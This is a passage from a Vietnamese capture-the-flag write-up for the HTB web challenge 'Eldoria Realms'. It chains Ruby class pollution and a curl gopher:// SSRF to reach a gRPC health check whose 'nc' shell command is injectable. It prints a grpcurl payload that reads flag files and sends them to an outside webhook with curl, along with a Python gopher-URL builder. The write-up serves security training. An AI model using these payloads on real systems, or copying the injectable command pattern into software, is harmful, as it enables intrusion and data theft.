<div class="code-container" data-rel="Ruby"><figure class="iseeu highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">func (s *server) <span class="title class_">CheckHealth</span>(ctx context.<span class="title class_">Context</span>, req *pb.<span class="title class_">HealthCheckRequest</span>) (*pb.<span class="title class_">HealthCheckResponse</span>, error) &#123;</span><br><span class="line">	ip <span class="symbol">:</span>= req.<span class="title class_">Ip</span></span><br><span class="line">	port <span class="symbol">:</span>= req.<span class="title class_">Port</span></span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> ip == <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">		ip = s.ip</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> port == <span class="string">&quot;&quot;</span> &#123;</span><br><span class="line">		port = s.port</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	err <span class="symbol">:</span>= healthCheck(ip, port)</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		<span class="keyword">return</span> &amp;pb.<span class="title class_">HealthCheckResponse</span>&#123;<span class="title class_">Status</span>: <span class="string">&quot;unhealthy&quot;</span>&#125;, <span class="literal">nil</span></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> &amp;pb.<span class="title class_">HealthCheckResponse</span>&#123;<span class="title class_">Status</span>: <span class="string">&quot;healthy&quot;</span>&#125;, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">func healthCheck(ip string, port string) error &#123;</span><br><span class="line">	cmd <span class="symbol">:</span>= exec.<span class="title class_">Command</span>(<span class="string">&quot;sh&quot;</span>, <span class="string">&quot;-c&quot;</span>, <span class="string">&quot;nc -zv &quot;</span>+ip+<span class="string">&quot; &quot;</span>+port)</span><br><span class="line">	output, err <span class="symbol">:</span>= cmd.<span class="title class_">CombinedOutput</span>()</span><br><span class="line">	<span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">		log.<span class="title class_">Printf</span>(<span class="string">&quot;Health check failed: %v, output: %s&quot;</span>, err, output)</span><br><span class="line">		<span class="keyword">return</span> fmt.<span class="title class_">Errorf</span>(<span class="string">&quot;health check failed: %v&quot;</span>, err)</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	log.<span class="title class_">Printf</span>(<span class="string">&quot;Health check succeeded: output: %s&quot;</span>, output)</span><br><span class="line">	<span class="keyword">return</span> <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>Từ <code>Dockerfile</code> phát hiện ra rằng phiên bản 7.70.0 được sử dụng, vốn dễ bị tấn công bằng cách chuyển đổi giao thức chéo sử dụng <code>gopher://</code> : </p>
<div class="code-container" data-rel="Dockerfile"><figure class="iseeu highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Install curl with shared library support</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> wget https://curl.haxx.se/download/curl-7.70.0.tar.gz &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    tar xfz curl-7.70.0.tar.gz &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    <span class="built_in">cd</span> curl-7.70.0/ &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    ./configure --with-ssl --enable-shared &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    make -j16 &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    make install &amp;&amp; \</span></span><br><span class="line"><span class="language-bash">    ldconfig</span></span><br></pre></td></tr></table></figure></div>
<p>Bằng cách thiết lập <code>realm_url</code> thành 1 URL với giao thức <code>gopher://</code>,ta buộc <code>curl</code> kết nối trực tiếp đến <code>127.0.0.50051</code> qua TCP.Thay vì xử lý nó như 1 HTTP request,<code>curl</code> coi đó là  <code>raw bytes</code> qua giao thức <code>gopher</code> ,ta có thể dựa vào điều này để tương tác với gRPC.</p>
<p>Tìm hiểu thêm về <code>gopher</code> tại <a class="link"   target="_blank" rel="noopener" href="https://infosecwriteups.com/how-gopher-works-in-escalating-ssrfs-ce6e5459b630" >đây<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a>.</p>
<h2 id="Khai-thac"><a href="#Khai-thac" class="headerlink" title="Khai thác"></a>Khai thác</h2><p>Flow: <code>Ruby class pollution</code> -&gt; <code>Curl gopher SSRF</code> -&gt; <code>GRPC protocol</code> -&gt; <code>Command injection</code></p>
<p>Đầu tiên ta cần tạo payload để gửi đi bằng <code>gopher</code>.<br>Sau khi cố craft bằng tay không được thì cách dùng các công cụ sẫn có như <a class="link"   target="_blank" rel="noopener" href="https://github.com/fullstorydev/grpcurl" >grpcurl<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a> để gửi request hợp lệ đến gRPC server và capture lại bằng <code>wireshark</code> thì sẽ hợp lý hơn.</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">grpcurl \</span><br><span class="line">  -plaintext \</span><br><span class="line">  -proto ./challenge/live_data.proto \</span><br><span class="line">  -d &#x27;&#123;&quot;ip&quot;:&quot;;&quot;,&quot;port&quot;:&quot;curl -d `cat /flag* | base64` &lt;link_webhook&gt; &quot;&#125;&#x27; \</span><br><span class="line">  localhost:50051 \</span><br><span class="line">  live.LiveDataService.CheckHealth</span><br></pre></td></tr></table></figure></div>
<p>Follow TCP Stream để lấy request.<br><a href="/images/eldoria-realm_01.png">image</a><br>Sau đó export ra dạng raw để xử lý.<br><a href="/images/eldoria-realm_02.png">image</a><br>Dùng python để xử lý hex và URLencode payload:</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> urllib.parse</span><br><span class="line"></span><br><span class="line"><span class="comment"># Đường dẫn đến file raw</span></span><br><span class="line">raw_file_path = <span class="string">&quot;dump_raw1&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Đọc dữ liệu nhị phân từ file</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(raw_file_path, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    raw_data = f.read()</span><br><span class="line"></span><br><span class="line"><span class="comment"># Percent-encode toàn bộ bytes</span></span><br><span class="line">encoded_data = urllib.parse.quote_from_bytes(raw_data)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Tạo Gopher URL </span></span><br><span class="line"><span class="comment"># Ký tự &quot;_&quot; ngay sau dấu &quot;/&quot; trong gopher://.../_ là để</span></span><br><span class="line"><span class="comment"># báo rằng phần tiếp theo là dữ liệu sẽ gửi đi.</span></span><br><span class="line">gopher_url = <span class="string">f&quot;gopher://127.0.0.1/_<span class="subst">&#123;encoded_data&#125;</span>&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Gopher URL:&quot;</span>)</span><br><span class="line"><span class="built_in">print</span>(gopher_url)</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>
<p>Khai thác <code>Class Pollution</code> để thay đổi <code>realm-url</code> thành <code>gopher URL</code>:<br><a href="/images/eldoria-realm_03.png">image</a></p>
<p>Gửi request tới endpoint <code>/connect-realm</code> để trigger tới lệnh curl<br><a href="/images/eldoria-realm_04.png">image</a><br><a href="/images/eldoria-realm_05.png">image</a></p>
<p>Decode để lấy flag:</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;SFRCe2Y0azNfZmw0Z19mMHJfdDM1dDFuZ30=&quot; | base64 -d</span><br><span class="line">HTB&#123;f4k3_fl4g_f0r_t35t1ng&#125;</span><br></pre></td></tr></table></figure></div>
		</div>

		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/CTF/">#CTF</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Web/">#Web</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/SSRF/">#SSRF</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/gRPC/">#gRPC</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Command-Injection/">#Command-Injection</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2025/03/28/cyber-attack/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">Cyber Attack</span>
						<span class="post-nav-item">Prev posts</span>
					</span>
				</a>
			</div>
			
			
		</div>
		


		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">On this page</div>
		<div class="page-title">Eldoria Realms</div>
		<ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Eldoria-Realms-Web-Challenge"><span class="nav-text">Eldoria Realms - Web Challenge</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Phan-tich"><span class="nav-text">Phân tích</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Ruby-class-pollution-qua-gop-de-quy"><span class="nav-text">Ruby class pollution qua gộp đệ quy</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Class-pollution-trong-Ruby"><span class="nav-text">Class pollution trong Ruby</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Curl-Gopher-SSRF-gRPC"><span class="nav-text">Curl Gopher SSRF -&gt; gRPC</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Khai-thac"><span class="nav-text">Khai thác</span></a></li></ol></li></ol>

	</div>
</div>
	</div>
	
</div>
			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
            <div class="customize-info my-1">404 Not Found. But you found me :)</div>
        
        <div class="text-center">
            &copy;
            
              <span>2025</span>
              -
            
            2026&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">Taneora</a>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.8.5</a></span>
        </div>
        
        
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container">
	<img src="">
</div>

	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>




	
<script src="/js/build/tools/imageViewer.js" type="module"></script>

<script src="/js/build/utils.js" type="module"></script>

<script src="/js/build/main.js" type="module"></script>

<script src="/js/build/layouts/navbarShrink.js" type="module"></script>

<script src="/js/build/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/build/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/build/layouts/categoryList.js" type="module"></script>





    
<script src="/js/build/tools/codeBlock.js" type="module"></script>




    
<script src="/js/build/layouts/lazyload.js" type="module"></script>






  
<script src="/js/build/libs/Typed.min.js"></script>

  
<script src="/js/build/plugins/typed.js" type="module"></script>








    
<script src="/js/build/libs/anime.min.js"></script>





    
<script src="/js/build/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/build/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/build/layouts/essays.js" type="module" data-swup-reload-script=""></script>





	
</body>

</html>